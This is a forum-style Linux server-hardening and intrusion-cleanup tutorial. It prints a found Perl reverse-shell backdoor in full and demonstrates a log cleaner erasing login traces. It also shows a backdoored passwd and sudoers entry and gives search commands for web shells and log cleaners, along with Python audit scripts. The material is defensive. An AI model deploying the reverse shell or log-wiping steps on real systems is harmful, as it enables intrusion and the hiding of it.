1 salmonss salmonss 387024 29 okt 17.03 sess_d5a45864fc730b68d7a583cdf20dcd5a -rw------- 1 kyrksido kyrksido 292 23 mar 21.36 sess_d5efed981a69885f653e4e73cfcbfff4 -rw------- 1 ninibse ninibse 224 22 apr 04.00 sess_d6cc76acd547b560f9b2774bce374b11 -rw------- 1 kyrksido kyrksido 3833 10 mar 23.57 sess_d80acad92182a17b23b21c709240d064 -rw------- 1 kyrksido kyrksido 3273 6 apr 07.59 sess_da958b4f6cb11b745b77a1edc5a61850 -rw------- 1 kyrksido kyrksido 21 14 apr 10.54 sess_da962cb333b6e3f08e9687fc754a5aa1 -rw------- 1 kyrksido kyrksido 292 9 mar 23.29 sess_dac6a0e0b6015bf5e8e366d63c8e6cbd -rw------- 1 ninibse ninibse 247 22 apr 03.54 sess_db23a4ff5b01f9a81f590bcfb79bda02 -rw------- 1 salmonss salmonss 399369 4 nov 08.39 sess_dbe98d7f4d5036f389a0b6df6327779b -rw------- 1 ihjmedia ihjmedia 251 2 dec 11.20 sess_dd3e87d49c7672a6e0135e0fefce1c88 -rw------- 1 ninibse ninibse 237 22 apr 04.08 sess_dd4a67afa3a67a37d020416ab56db8aa -rw------- 1 kyrksido kyrksido 0 28 mar 10.42 sess_dffd0c164075992fa0da5eb6359ec8ae -rw------- 1 kyrksido kyrksido 0 10 mar 03.16 sess_e1f530fa8314510a4e6e67d90117a584 -rw------- 1 salmonss salmonss 400300 1 nov 15.18 sess_e22cd6d922ef7fa1b44c55922addf7d2 -rw------- 1 ihjmedia ihjmedia 254 11 jan 10.49 sess_e3e6487d12366430538b2375e65154b6 -rw------- 1 kyrksido kyrksido 292 23 mar 03.31 sess_e63c5bd1903c80d9e3132042f065f26e -rw------- 1 ninibse ninibse 256 22 apr 03.56 sess_e98c1d77117331a101b067e078575462 -rw------- 1 salmonss salmonss 408216 13 nov 17.18 sess_eac8ce8407103adfe9a91f7a6dab8f86 -rw------- 1 kyrksido kyrksido 2043 18 apr 19.06 sess_eccaaaf8c5a0f0836114db7266cfae89 -rw------- 1 wiisidan wiisidan 0 22 apr 03.55 sess_ed0d26c0507b04314f6b8b0a1f822c4a -rw------- 1 kyrksido kyrksido 2674 10 mar 14.37 sess_ef2d25a38e6ef1c400c922f9285a49aa -rw------- 1 kyrksido kyrksido 3053 11 mar 23.40 sess_f16bf22bb3a8783263634f1cb21dd345 -rw------- 1 ihjmedia ihjmedia 254 2 dec 09.42 sess_f182c141f88e9f76924baab231e7ba9c -rw------- 1 kyrksido kyrksido 3273 
[... many sess_* PHP session files ...]
-rw-r--r-- 1 racimax racimax 48583 10 mar 17.50 shell1047
drwxr-xr-x 5 12 users 1024 11 okt 2009 sploit2009
-rw-r--r-- 1 12 users 70101 15 jan 19.08 sploit2009.tgz
-rw-r--r-- 1 racimax racimax 3430 26 mar 16.06 temp.log
-rw-r--r-- 1 racimax racimax 27302 8 okt 2009 tmp2217
-rw-r--r-- 1 racimax racimax 98519 13 apr 15.19 xem076d24c.txt
[/code]
lol :)) what's this:
[code]
-rw-r--r-- 1 racimax racimax 541 18 apr 19.42 back
-rwxr-xr-x 1 racimax racimax 6241 18 apr 19.43 backc
-rwxr-xr-x 1 racimax racimax 5748 17 apr 22.23 bc
-rw-r--r-- 1 racimax racimax 438 17 apr 22.23 bc.pl
[/code]
See that? A possible malicious attacker on our box :)) Hmm, let's check what bc.pl is :))
[code]
mywisdom@31337~#cat bc.pl
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);
mywisdom@31337~#
[/code]
lol, it's clearly a back connect in Perl :)) It connects out to the host and port given on the command line and attaches an interactive /bin/sh to that socket.
Ok, next search for possible c99 or r57 backdoors on your server:
[code]
# print one "rm" line for every PHP file under /home that mentions c99 or r57
find /home/ -name '*.php' -type f -print0 | xargs -0 grep -l 'c99' | sort -u | awk '{print "rm -rf " $0}'
find /home/ -name '*.php' -type f -print0 | xargs -0 grep -l 'r57' | sort -u | awk '{print "rm -rf " $0}'
[/code]
These only print the rm commands; review the list before running any of them, since a legitimate file can contain the string c99 or r57 as well, and a real shell may have been renamed or obfuscated. You may modify this to find other shells. A sample list of backdoors can be seen at www.saldiri.org; there are many others, like b374k.php, devshell, atlantiq, etc., too many to list here.
Then you may check manually for strange things. Let's look at /etc/passwd first:
[code]
mywisdom@d3v1l~#cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:0:0:games:/usr/games:/bin/bash
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
mysql:x:0:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanel-horde:x:32003:32005::/var/cpanel/userhomes/cpanel-horde:/usr/local/cpanel/bin/noshell
cpanel-phpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanel-phpmyadmin:/usr/local/cpanel/bin/noshell
cpanel-phppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanel-phppgadmin:/usr/local/cpanel/bin/noshell
ihjmedia:x:32006:32008::/home/ihjmedia:/bin/bash
aluminiu:x:32007:32009::/home/aluminiu:/bin/bash
ventilat:x:32008:32010::/home/ventilat:/bin/bash
alltomdi:x:32009:32011::/home/alltomdi:/bin/bash
luftfart:x:32010:32012::/home/luftfart:/bin/bash
guldkloc:x:32011:32013::/home/guldkloc:/bin/bash
folkhogs:x:32012:32014::/home/folkhogs:/bin/bash
reformat:x:32013:32015::/home/reformat:/bin/bash
alltomha:x:32014:32016::/home/alltomha:/bin/bash
datorins:x:32015:32017::/home/datorins:/bin/bash
kyrkforu:x:32016:32018::/home/kyrkforu:/bin/sh
janzzon:x:32017:32019::/home/janzzon:/bin/bash
ninibse:x:32018:32020::/home/ninibse:/bin/bash
racimax:x:32019:32021::/home/racimax:/bin/bash
pirense:x:32020:32022::/home/pirense:/bin/bash
medieb:x:32021:32023::/home/medieb:/bin/bash
bralinse:x:32022:32024::/home/bralinse:/bin/bash
mtek:x:32023:32025::/home/mtek:/bin/bash
perbrahe:x:32024:32026::/home/perbrahe:/bin/bash
salmonss:x:32025:32027::/home/salmonss:/bin/bash
bolagsfo:x:32026:32028::/home/bolagsfo:/bin/bash
kyrksido:x:32027:32029::/home/kyrksido:/bin/bash
finelady:x:32028:32030::/home/finelady:/bin/bash
accelera:x:32029:32031::/home/accelera:/bin/bash
wiisidan:x:32030:32032::/home/wiisidan:/bin/bash
colorita:x:32031:32033::/home/colorita:/bin/bash
pomonan:x:32032:32034::/home/pomonan:/usr/local/cpanel/bin/noshell
storgard:x:32033:32035::/home/storgard:/bin/bash
alltomch:x:32034:32036::/home/alltomch:/bin/bash
toworkse:x:32035:32037::/home/toworkse:/bin/bash
friskare:x:32036:32038::/home/friskare:/bin/bash
atlas:x:32037:32039::/home/atlas:/bin/bash
bienveni:x:32038:32040::/home/bienveni:/bin/bash
psykosyn:x:32039:32041::/home/psykosyn:/bin/bash
juldagen:x:32040:32042::/home/juldagen:/bin/bash
kondomgu:x:32041:32043::/home/kondomgu:/bin/bash
loveline:x:32042:32044::/home/loveline:/bin/bash
partysho:x:32043:32045::/home/partysho:/bin/bash
xnrsre:x:32044:32046::/home/xnrsre:/bin/bash
rifixse:x:32045:32047::/home/rifixse:/bin/bash
saldaxs:x:32046:32048::/home/saldaxs:/bin/bash
bioevalu:x:32047:32049::/home/bioevalu:/bin/bash
handana:x:32048:32050::/home/handana:/bin/bash
blaskap:x:32049:32051::/home/blaskap:/bin/bash
devel121:x:32050:32052::/home/devel121:/bin/bash
xnfrsl:x:32051:32053::/home/xnfrsl:/bin/bash
akespers:x:32052:32054::/home/akespers:/bin/bash
joafro:x:32053:32055::/home/joafro:/bin/bash
cpanelhorde:x:32054:32056::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32055:32057::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32056:32058::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32057:32059::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
menacemu:x:510:510::/home/menacemu:/bin/bash
annalena:x:511:511::/home/annalena:/bin/bash
allthals:x:512:512::/home/allthals:/bin/bash
simonfra:x:504:500::/home/simonfra:/bin/bash
wheel:x:0:0::/home/wheel:/bin/bash
[/code]
The suspicious line is this one, if you never created a user named wheel with UID 0 yourself:
[code]
wheel:x:0:0::/home/wheel:/bin/bash
[/code]
Note that games and mysql in this listing also carry UID 0, which they normally don't, so they deserve the same scrutiny. Then you may check lastlog:
[code]
lastlog
[/code]
Ok, let's go:
[code]
mywisdom@d3v1l~#lastlog
Användarnamn     Port     Från             Senast
root             pts/1    attacker_ip      tor apr 22 04:27:52 +0200 2010
bin                                        **Aldrig varit inloggad**
xnfrsl                                     **Aldrig varit inloggad**
akespers                                   **Aldrig varit inloggad**
joafro                                     **Aldrig varit inloggad**
menacemu                                   **Aldrig varit inloggad**
annalena                                   **Aldrig varit inloggad**
allthals                                   **Aldrig varit inloggad**
simonfra                                   **Aldrig varit inloggad**
wheel            pts/1    attacker_ip      tor apr 22 04:27:52 +0200 2010
[/code]
Wow, our attacker has rooted our box :)) Before we delete the account,
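Rather than reading a long passwd file by eye, the following added example (not code from the original post) flags every non-root account with UID 0 (on the listing above that is games, mysql and wheel), UIDs shared between accounts, and system accounts that carry a login shell. The sample passwd is constructed from lines of that listing plus two constructed entries (ftp given a bash shell, admin2 reusing simonfra's UID) to exercise the other checks; the cutoff SYSTEM_UID_MAX = 499 is an assumption for this RHEL-style box.

```python
# Shells that mean "no interactive login"; the cpanel one appears in the listing above,
# sync/halt/shutdown are the fixed commands of the matching system accounts.
NON_INTERACTIVE_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false",
                          "/usr/local/cpanel/bin/noshell", "/bin/sync",
                          "/sbin/halt", "/sbin/shutdown"}
SYSTEM_UID_MAX = 499   # assumption: RHEL-style layout, regular users start at 500


def audit_passwd(text):
    """Return [(account, finding), ...] in file order; an empty list means nothing odd."""
    findings = []
    owner_of_uid = {}                 # first account seen with each UID
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        name, _pw, uid_s, _gid, _gecos, _home, shell = fields
        if not uid_s.isdigit():
            findings.append((name, f"non-numeric uid {uid_s!r}"))
            continue
        uid = int(uid_s)
        if uid == 0 and name != "root":
            findings.append((name, "uid 0 but not root"))          # the wheel case
        elif uid in owner_of_uid:
            findings.append((name, f"uid {uid} shared with {owner_of_uid[uid]}"))
        owner_of_uid.setdefault(uid, name)
        if 0 < uid <= SYSTEM_UID_MAX and shell not in NON_INTERACTIVE_SHELLS:
            findings.append((name, f"system account with login shell {shell}"))
    return findings


# Constructed sample: lines from the post's listing, plus two constructed entries
# (ftp with a bash shell, admin2 reusing simonfra's UID) to trigger the other checks.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
games:x:0:0:games:/usr/games:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:0:101:MySQL server:/var/lib/mysql:/bin/bash
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
simonfra:x:504:500::/home/simonfra:/bin/bash
admin2:x:504:504::/home/admin2:/bin/bash
wheel:x:0:0::/home/wheel:/bin/bash
"""


def audit_file(path="/etc/passwd"):
    """Run the audit on a real file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for account, why in audit_passwd(SAMPLE_PASSWD):
        print(f"{account:10s} {why}")
```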
we must check what he has done:
[code]
cat /home/wheel/.bash_history
[/code]
Deleting the intruder:
[code]
userdel wheel
[/code]
:)) lol. Then you may check the logs in /var/log:
[code]
mywisdom@d3v1l~#ls
acpid                       cron.2                httpd             sa
anaconda.log                cron.3                lastlog           samba
anaconda.syslog             cron.4                lfd.log           scrollkeeper.log
anaconda.xlog               cups                  lfd.log.1.gz      secure
audit                       dcpumon               maillog           secure.1
bandwidth                   dmesg                 maillog.1         secure.2
boot.log                    exim_mainlog          maillog.2         secure.3
boot.log.1                  exim_mainlog.1.gz     maillog.3         secure.4
boot.log.2                  exim_mainlog.2.gz     maillog.4         setroubleshoot
boot.log.3                  exim_mainlog.3.gz     messages          spooler
boot.log.4                  exim_mainlog.4.gz     messages.1        spooler.1
btmp                        exim_paniclog         messages.2        spooler.2
checkphpv_error.log         exim_paniclog.1.gz    messages.3        spooler.3
checkphpv_output.log        exim_paniclog.2.gz    messages.4        spooler.4
chkservd.log                exim_paniclog.3.gz    pm                squid
conman                      exim_paniclog.4.gz    ppp               stunnel-4.15-build.log
conman.old                  exim_rejectlog        prelink           tallylog
cpanel-install-thread0.log  exim_rejectlog.1.gz   rpmpkgs           wtmp
cpanel-install-thread1.log  exim_rejectlog.2.gz   rpmpkgs.1         xferlog
cpupdate.env                exim_rejectlog.3.gz   rpmpkgs.2         xferlog.offset
cron                        exim_rejectlog.4.gz   rpmpkgs.3         xferlog.offsetftpsep
cron.1                      faillog               rpmpkgs.4         yum.log
mywisdom@d3v1l~#
[/code]
Desc:
access_log -> httpd logs
messages -> alerts from syslogd
utmp & wtmp -> who is on your server (you may also type w or who)
xferlog -> ftp daemon logs
sulog -> su logs
acct -> user activity logs
etc...
On a RHEL-style box like this one, su and sshd messages land in secure, and failed logins are recorded in btmp (read it with lastb).
Then let's see whether our sudoers file has been backdoored:
[code]
mywisdom@d3v1l~#cat /etc/sudoers
## Sudoers allows particular users to run various commands as
## the root user, without needing the root password.
##
## Examples are provided at the bottom of the file for collections
## of related commands, which can then be delegated out to particular
## users or groups.
##
## This file must be edited with the 'visudo' command.

## Host Aliases
## Groups of machines. You may prefer to use hostnames (perhap using
## wildcards for entire domains) or IP addresses instead.
# Host_Alias     FILESERVERS = fs1, fs2
# Host_Alias     MAILSERVERS = smtp, smtp2

## User Aliases
## These aren't often necessary, as you can use regular groups
## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname
## rather than USERALIAS
# User_Alias ADMINS = jsmith, mikem

## Command Aliases
## These are groups of related commands...

## Networking
Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool

## Installation and management of software
Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum

## Services
Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig

## Updating the locate database
Cmnd_Alias LOCATE = /usr/sbin/updatedb

## Storage
Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount

## Delegating permissions
Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp

## Processes
Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall

## Drivers
Cmnd_Alias DRIVERS = /sbin/modprobe

# Defaults specification

#
# Disable "ssh hostname sudo ", because it will show the password in clear.
#         You have to run "ssh -t hostname sudo ".
#
# Defaults    requiretty

Defaults    env_reset
Defaults    env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR \
                        LS_COLORS MAIL PS1 PS2 QTDIR USERNAME \
                        LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION \
                        LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC \
                        LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS \
                        _XKB_CHARSET XAUTHORITY"

## Next comes the main part: which users can run what software on
## which machines (the sudoers file can be shared between multiple
## systems).
## Syntax:
##
##      user    MACHINE=COMMANDS
##
## The COMMANDS section may have other options added to it.
##
## Allow root to run any commands anywhere
root    ALL=(ALL)       ALL
wheel   ALL = NOPASSWD: ALL
mywisdom@d3v1l~#
[/code]
Oops: "wheel ALL = NOPASSWD: ALL". Did you ever add that yourself for passwordless sudo??? Note that without a leading % this rule applies to a user named wheel, not to the wheel group, which fits the bogus UID 0 wheel account we found in /etc/passwd.
Then we may check for log cleaners on our system. Here's a simple demo of what a log cleaner does:
[code]
mywisdom@d3v1l~#w
 05:16:48 up 128 days, 18:20,  1 user,  load average: 0,82, 0,93, 0,98
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
mysql    pts/1    111.94.9.51       04:27    0.00s  0.13s  0.11s w
mywisdom@d3v1l~#./vanish mysql localhost ip
utmp target processed.
wtmp target processed.
lastlog target processed.
Processing /var/log/messages DONE.
Processing /var/log/secure DONE.
Processing /var/log/xferlog DONE.
Processing /var/log/maillog DONE.
Processing /var/log/warn Couldn't open /var/log/warn
Processing /var/log/mail Couldn't open /var/log/mail
Processing /var/log/httpd.access_log Couldn't open /var/log/httpd.access_log
Processing /var/log/httpd.error_log Couldn't open /var/log/httpd.error_log
mv: kan inte ta status på "warn.hm": Filen eller katalogen finns inte
mv: kan inte ta status på "mail.hm": Filen eller katalogen finns inte
mv: kan inte ta status på "httpda.hm": Filen eller katalogen finns inte
mv: kan inte ta status på "httpde.hm": Filen eller katalogen finns inte
V_A_N_I_S_H_E_D_!
Your tracks have been removed
Exiting programm !!
mywisdom@d3v1l~#w
 05:18:42 up 128 days, 18:22,  0 users,  load average: 1,15, 1,02, 1,00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
mywisdom@d3v1l~#
[/code]
See the difference???
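The defender's side of that demo, as an added example that is not code from the original post: walk wtmp record by record and report the holes a cleaner leaves behind (a record overwritten with zero bytes, a login record with an empty user name, timestamps running backwards). The record layout assumed is glibc's 384-byte struct utmp on x86_64 Linux, the wtmp bytes are constructed inside demo(), and chkrootkit's chkwtmp, built further down, performs a comparable check on the real file.

```python
import struct

# glibc struct utmp on x86_64 Linux (assumption: that layout, 384 bytes, little-endian):
# ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit (two shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], reserved[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS, DEAD_PROCESS = 7, 8       # ut_type values for a login and a logout


def _cstr(b):
    """Bytes up to the first NUL, as text."""
    return b.split(b"\0", 1)[0].decode("latin-1")


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one wtmp record; used here only to construct sample data."""
    def field(s, n):
        return s.encode()[:n].ljust(n, b"\0")
    return struct.pack(UTMP_FMT, ut_type, pid, field(line, 32), field(line[-4:], 4),
                       field(user, 32), field(host, 256), 0, 0, 0, tv_sec, 0,
                       0, 0, 0, 0, b"\0" * 20)


def parse_wtmp(data):
    """Yield (index, ut_type, user, line, host, tv_sec, raw_bytes) per whole record."""
    for i in range(len(data) // UTMP_SIZE):
        raw = data[i * UTMP_SIZE:(i + 1) * UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, raw)
        yield i, f[0], _cstr(f[4]), _cstr(f[2]), _cstr(f[5]), f[9], raw


def find_tampering(data):
    """Return [(record_index, reason), ...]; index -1 marks a file-level problem."""
    problems = []
    if len(data) % UTMP_SIZE:
        problems.append((-1, f"file length not a multiple of {UTMP_SIZE}"))
    last_ts = 0
    for i, ut_type, user, line, host, ts, raw in parse_wtmp(data):
        if raw == b"\0" * UTMP_SIZE:
            # Cleaners usually overwrite the record in place rather than shrink the file.
            problems.append((i, "record zeroed (classic log cleaner)"))
            continue
        if ut_type == USER_PROCESS and not user:
            problems.append((i, f"login on {line} with empty user"))
        if ts < last_ts:
            problems.append((i, "timestamp goes backwards"))
        last_ts = max(last_ts, ts)
    return problems


def check_file(path="/var/log/wtmp"):
    """Run the check on a real wtmp file."""
    with open(path, "rb") as fh:
        return find_tampering(fh.read())


def demo():
    """Constructed wtmp: a normal login/logout pair, a wiped record, a nameless login."""
    data = b"".join([
        pack_record(USER_PROCESS, 100, "pts/0", "kyrksido", "10.0.0.5", 1271900000),
        pack_record(DEAD_PROCESS, 100, "pts/0", "", "", 1271900600),
        b"\0" * UTMP_SIZE,
        pack_record(USER_PROCESS, 200, "pts/1", "", "attacker_ip", 1271901000),
    ])
    return find_tampering(data)


if __name__ == "__main__":
    for idx, why in demo():
        print(f"record {idx}: {why}")
```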
An attacker can edit utmp and wtmp to make himself disappear from the output of commands like w or who. Here you can see some of the log cleaners intruders often use:
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=log+cleaner&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0
You can try to find them by name, though this isn't very reliable, since the attacker may already have renamed the files:
[code]
find / -name 'vanish'
find / -name 'wzap'
find / -name 'szapper'
find / -name 'vanish.c'
find / -name 'wzap.c'
find / -name 'szapper.c'
and so on .................
[/code]
[b]Installing suPHP[/b]
With suPHP, each PHP script runs under the uid of its owner, so file permissions can be set so that only that user can read the file, and a PHP page can write only where its owner can write. So PHP no longer runs as a shared id like nobody or apache or whatever other general httpd id :-p; the privileges of each user's PHP are separated. For manual installation see:
http://www.suphp.org/DocumentationView.html?file=INSTALL
[b]Root Kit checking using chkrootkit[/b]
Here we go:
[code]
mywisdom@devilzc0der~#wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
--10:05:35--  ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
           => `chkrootkit.tar.gz'
Resolving ftp.pangeia.com.br... 200.155.17.114
Connecting to ftp.pangeia.com.br|200.155.17.114|:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /pub/seg/pac ... done.
==> PASV ... done.    ==> RETR chkrootkit.tar.gz ... done.
Length: 39,421 (38K) (unauthoritative)

100%[=================================================================>] 39,421        16.79K/s

10:05:45 (16.76 KB/s) - `chkrootkit.tar.gz' saved [39421]

mywisdom@devilzc0der~#tar zxvf chkrootkit.tar.gz
chkrootkit-0.49
chkrootkit-0.49/chkrootkit.lsm
chkrootkit-0.49/README.chkwtmp
chkrootkit-0.49/COPYRIGHT
chkrootkit-0.49/Makefile
chkrootkit-0.49/chkutmp.c
chkrootkit-0.49/ifpromisc.c
chkrootkit-0.49/chkrootkit
chkrootkit-0.49/ACKNOWLEDGMENTS
chkrootkit-0.49/check_wtmpx.c
chkrootkit-0.49/chkdirs.c
chkrootkit-0.49/README.chklastlog
chkrootkit-0.49/chklastlog.c
chkrootkit-0.49/strings.c
chkrootkit-0.49/README
chkrootkit-0.49/chkproc.c
chkrootkit-0.49/chkwtmp.c
mywisdom@devilzc0der~#cd chkrootkit-0.49
mywisdom@devilzc0der~#make
*** stopping make sense ***
make[1]: Entering directory `/root/suphp-0.7.1/chkrootkit-0.49'
gcc -DHAVE_LASTLOG_H -o chklastlog chklastlog.c
gcc -DHAVE_LASTLOG_H -o chkwtmp chkwtmp.c
chkwtmp.c: In function 'main':
chkwtmp.c:95: warning: incompatible implicit declaration of built-in function 'exit'
gcc -DHAVE_LASTLOG_H -D_FILE_OFFSET_BITS=64 -o ifpromisc ifpromisc.c
gcc -o chkproc chkproc.c
gcc -o chkdirs chkdirs.c
gcc -o check_wtmpx check_wtmpx.c
gcc -static -o strings-static strings.c
gcc -o chkutmp chkutmp.c
make[1]: Leaving directory `/root/suphp-0.7.1/chkrootkit-0.49'
[/code]
Ok, let's test whether we have infected ELF binaries or not:
[code]
mywisdom@devilzc0der~#chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'...
-------and so on-----------------
[/code]
The "can't exec ./strings-static, not tested" line means the helper binaries built by make were not found in the current directory; run it from the chkrootkit-0.49 directory as ./chkrootkit so the ldsopreload and wtmp/lastlog checks actually run.
[b]Installing Jailkit for jailing our intruder ;-p (bruakakakaka :))[/b]
Jailkit is a set of utilities to limit user accounts to specific files using chroot() and/or specific commands. Setting up a chroot shell, a shell limited to some specific command, or a daemon inside a chroot jail is a lot easier and can be automated using these utilities. Jailkit is known to be used in network security appliances from several leading IT security firms, internet servers from several large enterprise organizations, internet servers from internet service providers, as well as many smaller companies and private users that need to secure cvs, sftp, shell or daemon processes.
[code]
mywisdom@devilzc0der~#wget http://olivier.sessink.nl/jailkit/jailkit-2.11.tar.gz
--10:13:12--  http://olivier.sessink.nl/jailkit/jailkit-2.11.tar.gz
           => `jailkit-2.11.tar.gz'
Resolving olivier.sessink.nl... 137.224.32.205
Connecting to olivier.sessink.nl|137.224.32.205|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132,196 (129K) [application/x-tar]

100%[=================================================================>] 132,196       29.2